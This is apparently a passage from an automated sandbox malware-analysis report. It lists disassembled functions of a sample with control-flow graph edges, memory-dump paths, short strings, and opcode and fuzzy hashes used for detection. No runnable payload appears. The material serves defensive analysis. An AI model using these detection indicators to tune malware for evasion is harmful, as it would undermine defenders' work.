7ffd99e2cd71-7ffd99e2cd76 263->268 269 7ffd99e2cd4b-7ffd99e2cd65 264->269 270 7ffd99e2cd99-7ffd99e2cdc5 264->270 267->264 276 7ffd99e2cdc2-7ffd99e2cdc5 267->276 269->268 278 7ffd99e2cdc7-7ffd99e2ce42 270->278 276->278 290 7ffd99e2ce49-7ffd99e2ce4e call 7ffd99e2bb18 278->290 292 7ffd99e2ce53-7ffd99e2ce58 290->292 293 7ffd99e2ce5f-7ffd99e2ce62 call 7ffd99e2a140 292->293 295 7ffd99e2ce67-7ffd99e2ce6e 293->295 296 7ffd99e2ce70-7ffd99e2ce85 call 7ffd99e2a2a0 295->296 298 7ffd99e2ce8a-7ffd99e2ced4 296->298
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: VM_L$xM_^
                                                                                      • API String ID: 0-2879818347
                                                                                      • Opcode ID: 96d0133b6f64b0d37c5a5766de1f3b1f52cd266ca1d219a3925801470d23b401
                                                                                      • Instruction ID: a675b56127ecf170ca79cbef2e38c2f38778082459861637af444e9d1dddd5c2
                                                                                      • Opcode Fuzzy Hash: 96d0133b6f64b0d37c5a5766de1f3b1f52cd266ca1d219a3925801470d23b401
                                                                                      • Instruction Fuzzy Hash: 5B220A17F0D15687E351BEACF8B54EA3B90DFC123D70D81B7D18C8A0EBED1A64468296
                                                                                      Function 00007FFD99E2CD78 Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #wM_^$VM_L
                                                                                      • API String ID: 0-1653592661
                                                                                      • Opcode ID: 5fbba53c22cfbe646ed30834a447fcf1834800dbe39e5da78b3b1bc85a2312e4
                                                                                      • Instruction ID: 03a3a1cfd5c3f81df33ffac2604d32e00d1769061ce3a65c41c5554b4c94378c
                                                                                      • Opcode Fuzzy Hash: 5fbba53c22cfbe646ed30834a447fcf1834800dbe39e5da78b3b1bc85a2312e4
                                                                                      • Instruction Fuzzy Hash: 2B414563B1DA494FDB64EE2CD8A55E977E1EFA532430801FAD049C7197DE16BC028781
                                                                                      Function 00007FFD99E17B99 Relevance: 2.1, Instructions: 2063COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 78f90d130993211c5943a2cb3fc181038fc25ae6f247a9872a61f3f400bc2d83
                                                                                      • Instruction ID: d7c4a194fa06c354e3f71cafd94b93fbd9773c8e7a9e479094fd8c02bdd73cc7
                                                                                      • Opcode Fuzzy Hash: 78f90d130993211c5943a2cb3fc181038fc25ae6f247a9872a61f3f400bc2d83
                                                                                      • Instruction Fuzzy Hash: A2F21530A09A8E8FDB95EF58C895BE97BF1FF58304F0441B9E419C729ACA34E841C742
                                                                                      Function 00007FFD99E19CF8 Relevance: 2.1, Instructions: 2054COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c59a1d4130827517eba55f5cd5107f294f1bdec69e33b15c1d0a97b6ad94b2bc
                                                                                      • Instruction ID: fddd7a58c45800ffc5348f6f3014276debcfe2c1d45cd628d9edaf1000b87de0
                                                                                      • Opcode Fuzzy Hash: c59a1d4130827517eba55f5cd5107f294f1bdec69e33b15c1d0a97b6ad94b2bc
                                                                                      • Instruction Fuzzy Hash: F0F25430609A8D8FDB95EF68C4A4BE977E1FF59304F1804B9D45DCB2A6CA35E842C701
                                                                                      Function 00007FFD99E4A250 Relevance: 1.8, Strings: 1, Instructions: 571COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1483 7ffd99e4a250-7ffd99e4a2b0 1484 7ffd99e4a2b2-7ffd99e4a2b7 call 7ffd99e30990 1483->1484 1485 7ffd99e4a2bc-7ffd99e4a2ce 1483->1485 1484->1485 1487 7ffd99e4a2e2-7ffd99e4a339 1485->1487 1488 7ffd99e4a2d0-7ffd99e4a2e1 1485->1488 1491 7ffd99e4a33f-7ffd99e4a351 1487->1491 1492 7ffd99e4a639-7ffd99e4a64f 1487->1492 1488->1487 1493 7ffd99e4a44d-7ffd99e4a451 1491->1493 1494 7ffd99e4a357-7ffd99e4a35f 1491->1494 1501 7ffd99e4a651-7ffd99e4a658 1492->1501 1502 7ffd99e4a659-7ffd99e4a6ae 1492->1502 1496 7ffd99e4a4d4-7ffd99e4a4de 1493->1496 1497 7ffd99e4a457-7ffd99e4a461 1493->1497 1494->1492 1498 7ffd99e4a365-7ffd99e4a37d 1494->1498 1499 7ffd99e4a4e0-7ffd99e4a4f0 call 7ffd99e309b0 1496->1499 1500 7ffd99e4a509-7ffd99e4a50c 1496->1500 1497->1492 1503 7ffd99e4a467-7ffd99e4a478 1497->1503 1504 7ffd99e4a383-7ffd99e4a3b4 1498->1504 1505 7ffd99e4a40f-7ffd99e4a432 1498->1505 1520 7ffd99e4a4f5-7ffd99e4a502 1499->1520 1510 7ffd99e4a50f-7ffd99e4a51e 1500->1510 1501->1502 1525 7ffd99e4a6b0-7ffd99e4a6b6 1502->1525 1526 7ffd99e4a6cb-7ffd99e4a6dc 1502->1526 1503->1510 1506 7ffd99e4a3b6-7ffd99e4a3c6 1504->1506 1507 7ffd99e4a3c8-7ffd99e4a40d 1504->1507 1505->1492 1508 7ffd99e4a438-7ffd99e4a447 1505->1508 1506->1507 1507->1505 1519 7ffd99e4a47d-7ffd99e4a487 1507->1519 1508->1493 1508->1494 1510->1492 1514 7ffd99e4a524-7ffd99e4a542 1510->1514 1514->1492 1518 7ffd99e4a548-7ffd99e4a581 1514->1518 1518->1492 1535 7ffd99e4a587-7ffd99e4a5a9 1518->1535 1522 7ffd99e4a493-7ffd99e4a4a3 1519->1522 1523 7ffd99e4a489 1519->1523 1520->1500 1522->1492 1527 7ffd99e4a4a9-7ffd99e4a4d3 1522->1527 1523->1522 1528 7ffd99e4a711-7ffd99e4a754 1525->1528 1529 7ffd99e4a6b8-7ffd99e4a6c9 1525->1529 1530 7ffd99e4a6ed-7ffd99e4a710 1526->1530 1531 7ffd99e4a6de-7ffd99e4a6ec 1526->1531 1546 7ffd99e4a756-7ffd99e4a766 1528->1546 1547 7ffd99e4a768-7ffd99e4a775 1528->1547 1529->1525 1529->1526 1531->1530 1535->1492 1542 7ffd99e4a5af-7ffd99e4a5c1 1535->1542 1544 7ffd99e4a5c3-7ffd99e4a5ce 1542->1544 1545 7ffd99e4a624-7ffd99e4a638 1542->1545 1544->1545 1551 7ffd99e4a5d0-7ffd99e4a5e7 1544->1551 1546->1547 1553 7ffd99e4a5e9-7ffd99e4a5f4 1551->1553 1554 7ffd99e4a5f8-7ffd99e4a61f call 7ffd99e309b0 1551->1554 1553->1554 1554->1545
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: d
                                                                                      • API String ID: 0-2564639436
                                                                                      • Opcode ID: 9d7a178805623b10eb95606075f9b1a9bb78dddb44959d52f6b5fa3be0573b8b
                                                                                      • Instruction ID: 2a8b8615ddf3e6d67a363fc0544c128fb973f071caf0b70b670aa5974e50498a
                                                                                      • Opcode Fuzzy Hash: 9d7a178805623b10eb95606075f9b1a9bb78dddb44959d52f6b5fa3be0573b8b
                                                                                      • Instruction Fuzzy Hash: 2802E130A19A498FD768DF18C4A5AB5B3E1FF94314F14457ED08EC7696CA36F842CB82
                                                                                      Function 00007FFD99E24D50 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1730 7ffd99e24d50-7ffd99e24e08 1742 7ffd99e24e25-7ffd99e24e38 1730->1742 1743 7ffd99e24e0a-7ffd99e24e21 1730->1743 1745 7ffd99e24e3b-7ffd99e24e49 1742->1745 1743->1742 1745->1745 1746 7ffd99e24e4b-7ffd99e24e76 1745->1746 1749 7ffd99e24e7c-7ffd99e24e94 call 7ffd99e16968 1746->1749 1750 7ffd99e24f2b-7ffd99e24f2d 1746->1750 1758 7ffd99e24f02-7ffd99e24f13 1749->1758 1759 7ffd99e24e96-7ffd99e24e97 1749->1759 1751 7ffd99e253f2-7ffd99e2543d call 7ffd99e21c40 1750->1751 1752 7ffd99e24f33-7ffd99e24fbb 1750->1752 1771 7ffd99e2503d-7ffd99e2504e 1752->1771 1772 7ffd99e24fc1-7ffd99e24fff 1752->1772 1761 7ffd99e24f15 1758->1761 1762 7ffd99e24f1a-7ffd99e24f28 1758->1762 1764 7ffd99e24e98-7ffd99e24ed1 1759->1764 1761->1762 1762->1750 1764->1758 1773 7ffd99e25050 1771->1773 1774 7ffd99e25055-7ffd99e25085 1771->1774 1772->1771 1773->1774 1778 7ffd99e253e8-7ffd99e253ef 1774->1778 1779 7ffd99e2508b-7ffd99e2509d 1774->1779 1778->1751 1780 7ffd99e25010-7ffd99e25036 1779->1780 1781 7ffd99e250a3-7ffd99e250af 1779->1781 1780->1771 1782 7ffd99e25271-7ffd99e252ad 1781->1782 1783 7ffd99e250b5-7ffd99e250f6 call 7ffd99e16630 1781->1783 1786 7ffd99e252af-7ffd99e252b8 1782->1786 1787 7ffd99e252eb-7ffd99e25302 1782->1787 1809 7ffd99e250f8-7ffd99e25101 1783->1809 1789 7ffd99e252ca-7ffd99e252e1 1786->1789 1790 7ffd99e252ba-7ffd99e252c0 1786->1790 1794 7ffd99e25304-7ffd99e25313 1787->1794 1795 7ffd99e2536c-7ffd99e253a4 1787->1795 1789->1787 1798 7ffd99e252e3-7ffd99e252e4 1789->1798 1790->1789 1794->1795 1804 7ffd99e25315-7ffd99e25318 1794->1804 1801 7ffd99e25166-7ffd99e25186 1795->1801 1802 7ffd99e253aa-7ffd99e253af 1795->1802 1798->1787 1801->1782 1805 7ffd99e253b7-7ffd99e253e2 1802->1805 1804->1795 1806 7ffd99e2531a-7ffd99e2531e 1804->1806 1805->1778 1805->1779 1806->1795 1808 7ffd99e25320-7ffd99e25367 call 7ffd99e20e38 1806->1808 1808->1795 1811 7ffd99e25108-7ffd99e2510f 1809->1811 1812 7ffd99e25111-7ffd99e25125 call 7ffd99e1f748 1811->1812 1816 7ffd99e2512a-7ffd99e25153 1812->1816 1816->1751
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ^
                                                                                      • API String ID: 0-1590793086
                                                                                      • Opcode ID: b5e5b02726af872b380fe85c84a6dcfdb59098621aef2eb4c9c9306828ec4009
                                                                                      • Instruction ID: 9d27672b22a69b96cc399a621e59401a9596a76eb43f3f4d9c1d5239acafe6dd
                                                                                      • Opcode Fuzzy Hash: b5e5b02726af872b380fe85c84a6dcfdb59098621aef2eb4c9c9306828ec4009
                                                                                      • Instruction Fuzzy Hash: 43E11A31B09A4E4FDB95EF58C8A0AEE77E1FF98314B0446B9D419C719ACE35E842C781
                                                                                      Function 00007FFD99E2AE50 Relevance: 1.6, Strings: 1, Instructions: 360COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2051 7ffd99e2ae50-7ffd99e5c5e6 call 7ffd99e2fed0 2055 7ffd99e5c5eb-7ffd99e5c5ed 2051->2055 2056 7ffd99e5c5ef-7ffd99e5c600 call 7ffd99e5c520 2055->2056 2057 7ffd99e5c606-7ffd99e5c610 call 7ffd99e2fe68 2055->2057 2056->2057 2062 7ffd99e5c8ea-7ffd99e5c8f7 2056->2062 2063 7ffd99e5c612-7ffd99e5c61e call 7ffd99e2fe68 2057->2063 2064 7ffd99e5c636-7ffd99e5c640 call 7ffd99e2fe68 2057->2064 2063->2064 2071 7ffd99e5c620-7ffd99e5c630 call 7ffd99e2ae28 2063->2071 2069 7ffd99e5c642-7ffd99e5c64e call 7ffd99e2fe60 2064->2069 2070 7ffd99e5c666-7ffd99e5c670 call 7ffd99e2fe60 2064->2070 2069->2070 2078 7ffd99e5c650-7ffd99e5c660 call 7ffd99e2ae60 2069->2078 2079 7ffd99e5c672-7ffd99e5c67e call 7ffd99e2fe60 2070->2079 2080 7ffd99e5c696-7ffd99e5c6a0 call 7ffd99e2fe60 2070->2080 2071->2062 2071->2064 2078->2062 2078->2070 2079->2080 2089 7ffd99e5c680-7ffd99e5c690 call 7ffd99e2ae60 2079->2089 2087 7ffd99e5c6f2-7ffd99e5c700 2080->2087 2088 7ffd99e5c6a2-7ffd99e5c6ae call 7ffd99e2fe60 2080->2088 2093 7ffd99e5c702-7ffd99e5c70a 2087->2093 2094 7ffd99e5c777-7ffd99e5c790 call 7ffd99e2ae18 2087->2094 2088->2087 2100 7ffd99e5c6b0-7ffd99e5c6b3 2088->2100 2089->2062 2089->2080 2098 7ffd99e5c70c-7ffd99e5c723 2093->2098 2099 7ffd99e5c73b-7ffd99e5c73e 2093->2099 2094->2062 2104 7ffd99e5c796-7ffd99e5c799 2094->2104 2098->2099 2112 7ffd99e5c725-7ffd99e5c735 call 7ffd99e2ae30 2098->2112 2103 7ffd99e5c740-7ffd99e5c751 call 7ffd99e5c520 2099->2103 2099->2104 2100->2087 2105 7ffd99e5c6b5-7ffd99e5c6d9 2100->2105 2103->2062 2120 7ffd99e5c757-7ffd99e5c775 call 7ffd99e2a418 2103->2120 2108 7ffd99e5c7b1-7ffd99e5c7bb call 7ffd99e2fe18 2104->2108 2109 7ffd99e5c79b-7ffd99e5c7ab call 7ffd99e2ae48 2104->2109 2105->2112 2121 7ffd99e5c6db-7ffd99e5c6ec call 7ffd99e2ae78 2105->2121 2123 7ffd99e5c7bd-7ffd99e5c7ce call 7ffd99e5c520 2108->2123 2124 7ffd99e5c828-7ffd99e5c832 call 7ffd99e2fe18 2108->2124 2109->2062 2109->2108 2112->2062 2112->2099 2120->2094 2121->2062 2121->2087 2123->2062 2135 7ffd99e5c7d4-7ffd99e5c7e3 call 7ffd99e5c520 2123->2135 2133 7ffd99e5c834-7ffd99e5c840 call 7ffd99e2fe18 2124->2133 2134 7ffd99e5c87b-7ffd99e5c889 2124->2134 2133->2134 2148 7ffd99e5c842-7ffd99e5c879 call 7ffd99e2ae78 2133->2148 2139 7ffd99e5c88c-7ffd99e5c893 2134->2139 2140 7ffd99e5c8d6 2134->2140 2135->2062 2145 7ffd99e5c7e9-7ffd99e5c822 call 7ffd99e2a418 call 7ffd99e2ae18 2135->2145 2146 7ffd99e5c8a3-7ffd99e5c8a6 2139->2146 2147 7ffd99e5c895-7ffd99e5c8a1 call 7ffd99e2fed0 2139->2147 2143 7ffd99e5c8f8-7ffd99e5c902 2140->2143 2144 7ffd99e5c8d8-7ffd99e5c8e8 call 7ffd99e2ae58 2140->2144 2144->2062 2144->2143 2145->2062 2145->2124 2152 7ffd99e5c8c1-7ffd99e5c8d0 2146->2152 2153 7ffd99e5c8a8-7ffd99e5c8bf 2146->2153 2147->2062 2147->2146 2148->2062 2148->2134 2163 7ffd99e5c8d2-7ffd99e5c8d4 2152->2163 2164 7ffd99e5c91c-7ffd99e5c92c 2152->2164 2153->2062 2153->2152 2163->2140
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: uJ_H
                                                                                      • API String ID: 0-1166806941
                                                                                      • Opcode ID: c6925643fff9bfe7784e4feaa2b89a804f9c1484ce5835d2cd353e62b31a0630
                                                                                      • Instruction ID: d12db223c0c4c0ccd40278ff2d25e9caa344497bb23edf01edf6da3eedfa3b17
                                                                                      • Opcode Fuzzy Hash: c6925643fff9bfe7784e4feaa2b89a804f9c1484ce5835d2cd353e62b31a0630
                                                                                      • Instruction Fuzzy Hash: 08A12121B1AA0A0AEDF5DED854B52B923C2DFA8B69F540079D80DC72D6DD1BFC474283
                                                                                      Function 00007FFD99E12728 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {'
                                                                                      • API String ID: 0-2381349322
                                                                                      • Opcode ID: 05f429c0607ef2135c28dd1643ca8db4343aa57c0ac1abf3377581fe2e7aebe3
                                                                                      • Instruction ID: a2fcca04a388c47e923da9a6a4e6e453615001950147ab5d115a5416e2197a8c
                                                                                      • Opcode Fuzzy Hash: 05f429c0607ef2135c28dd1643ca8db4343aa57c0ac1abf3377581fe2e7aebe3
                                                                                      • Instruction Fuzzy Hash: F791F972F1D9490FDB74EB6C98956BDB7E1EF98754F00017AE04DD3286DE2468428742
                                                                                      Function 00007FFD99E10E18 Relevance: 1.6, Strings: 1, Instructions: 323COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {'
                                                                                      • API String ID: 0-2381349322
                                                                                      • Opcode ID: 0f88897472e1659dbc3ac67c00033ebcc1c1bab2fe029c21bab68a94beecd218
                                                                                      • Instruction ID: 879b446130c6b8e13feeb58e7cbe03a101be2ff6a920c021d3a60b6fc6b280c7
                                                                                      • Opcode Fuzzy Hash: 0f88897472e1659dbc3ac67c00033ebcc1c1bab2fe029c21bab68a94beecd218
                                                                                      • Instruction Fuzzy Hash: 3591F972F1D9494FDB74EB6C9895ABDB7E1EF98714F00017AE04ED3286DE2468428782
                                                                                      Function 00007FFD99E1C5C2 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: _N_L
                                                                                      • API String ID: 0-2322017282
                                                                                      • Opcode ID: 7adc48dd740094cb03e54473aaab480a5704f0c1314addef57567a7cfda1b294
                                                                                      • Instruction ID: 76a19a300242beef4f5a8d654d58dd9b40b0ae38b60a0f6d5b294c82bff4b9dd
                                                                                      • Opcode Fuzzy Hash: 7adc48dd740094cb03e54473aaab480a5704f0c1314addef57567a7cfda1b294
                                                                                      • Instruction Fuzzy Hash: 3191D631B0DA4A4FDBA8EF58C4E16A973E1FF58314B1405B9D41AC7296CE36F842C781
                                                                                      Function 00007FFD99E286E8 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "
                                                                                      • API String ID: 0-123907689
                                                                                      • Opcode ID: 66d9f050a031fe99f9811f8aef42e337137fc7eb00aecf2744a8a6e759bb3ced
                                                                                      • Instruction ID: 70c79043900ccdb106fb51210bd1b6817da4f2e88b73d270dd18290125158a8a
                                                                                      • Opcode Fuzzy Hash: 66d9f050a031fe99f9811f8aef42e337137fc7eb00aecf2744a8a6e759bb3ced
                                                                                      • Instruction Fuzzy Hash: 1C71F632B1C9494FDB68EE2C94A59B573D1EFA9314704417EE44EC3296DE27BC028786
                                                                                      Function 00007FFD99E63C98 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: I_H
                                                                                      • API String ID: 0-288374528
                                                                                      • Opcode ID: b204f80cc073a38b57172cf10ac224cd7a36b52ad0c1611856939314bb0c2f54
                                                                                      • Instruction ID: 56928406f4120882a16a80d820d98612cef210c33a7c6995f2723ce13be8bc36
                                                                                      • Opcode Fuzzy Hash: b204f80cc073a38b57172cf10ac224cd7a36b52ad0c1611856939314bb0c2f54
                                                                                      • Instruction Fuzzy Hash: 4571E661A1DF490FD768EF2848566B677D1EBA8224F04457FD09EC31AAED35B8068382
                                                                                      Function 00007FFD99E5B4D0 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .J_H
                                                                                      • API String ID: 0-1501595454
                                                                                      • Opcode ID: 3aceef54466b7822ab51956b6637c29b841a7d64bf1442551c3eca63cc0030b8
                                                                                      • Instruction ID: 57d89bc088e249e1fb092688424793192fd9abf7be2ffd7aa814b9534f34a9b3
                                                                                      • Opcode Fuzzy Hash: 3aceef54466b7822ab51956b6637c29b841a7d64bf1442551c3eca63cc0030b8
                                                                                      • Instruction Fuzzy Hash: 1761A130B19A258BEB78DA69D4A0A72B3D2FF94319F14457DD08E83695CE36FC42C742
                                                                                      Function 00007FFD99E5C520 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: wJ_H
                                                                                      • API String ID: 0-4018521878
                                                                                      • Opcode ID: c472fbec00d01f7a2cca0699608de2b660a854ef974117f2b3974ab684d727cd
                                                                                      • Instruction ID: ccd405ae7cdc3e6b5a9ad07dae816b8e23ea39e0fde229b312430ad615cbc4be
                                                                                      • Opcode Fuzzy Hash: c472fbec00d01f7a2cca0699608de2b660a854ef974117f2b3974ab684d727cd
                                                                                      • Instruction Fuzzy Hash: 36517012F1A90A06EDF5DEEC24B52B953C2DFA86B9B480576D80DC72D6DD1FAC424283
                                                                                      Function 00007FFD99E2FEF0 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DM_^
                                                                                      • API String ID: 0-4236260237
                                                                                      • Opcode ID: 067c34f676a3f4d09ec7c0756a8b9b7c285f97f231f2c6d0181bf733aa412f3d
                                                                                      • Instruction ID: e197046a92da7e06042c7af2606511a7941c2f5111ed09f0e5574c649adfa54c
                                                                                      • Opcode Fuzzy Hash: 067c34f676a3f4d09ec7c0756a8b9b7c285f97f231f2c6d0181bf733aa412f3d
                                                                                      • Instruction Fuzzy Hash: CC515517E0E1A697E7517ABC7CB64EA3F90DF4227C70D82B3D0DC490EBAC09154A8297
                                                                                      Function 00007FFD99E5C450 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: wJ_H
                                                                                      • API String ID: 0-4018521878
                                                                                      • Opcode ID: 8ca8fda6dfc1310ac93465059f09ba19f018fa308acdbaf1f0342b7f25e9158d
                                                                                      • Instruction ID: 25294e789ff1d22e6611fefe9ec1f03ae3888b5dfa7c9a5bb2c75ac2b6e16686
                                                                                      • Opcode Fuzzy Hash: 8ca8fda6dfc1310ac93465059f09ba19f018fa308acdbaf1f0342b7f25e9158d
                                                                                      • Instruction Fuzzy Hash: 0931D022B1A90A0FEEB4D9DD68B477563C2EBD8669F5801B6D40DC7299CD1BDC438283
                                                                                      Function 00007FFD99E1F27D Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PN_^
                                                                                      • API String ID: 0-566054172
                                                                                      • Opcode ID: 6b552ca591a24820c0fa95fcbe7a77799fcaa3afd330b81958366f55256d7773
                                                                                      • Instruction ID: 490c9d13a43b94d5daea9ba81cfa4bd4293ea3ae54d62aee944e584052f28f03
                                                                                      • Opcode Fuzzy Hash: 6b552ca591a24820c0fa95fcbe7a77799fcaa3afd330b81958366f55256d7773
                                                                                      • Instruction Fuzzy Hash: CD41A221A0E6C60FE3725B7458B55E57FA0DF47228F4906FBD099CA4E3D80E650A8393
                                                                                      Function 00007FFD99E107A8 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-65463447
                                                                                      • Opcode ID: 3da815971f67747330040512ae12740d49af1e7c26d4c91725c8fbe9c2c50f14
                                                                                      • Instruction ID: 19f40234e09e6253a3d07cdbbbede0f5f3c0edc3bfaff95c60b771a41325a27b
                                                                                      • Opcode Fuzzy Hash: 3da815971f67747330040512ae12740d49af1e7c26d4c91725c8fbe9c2c50f14
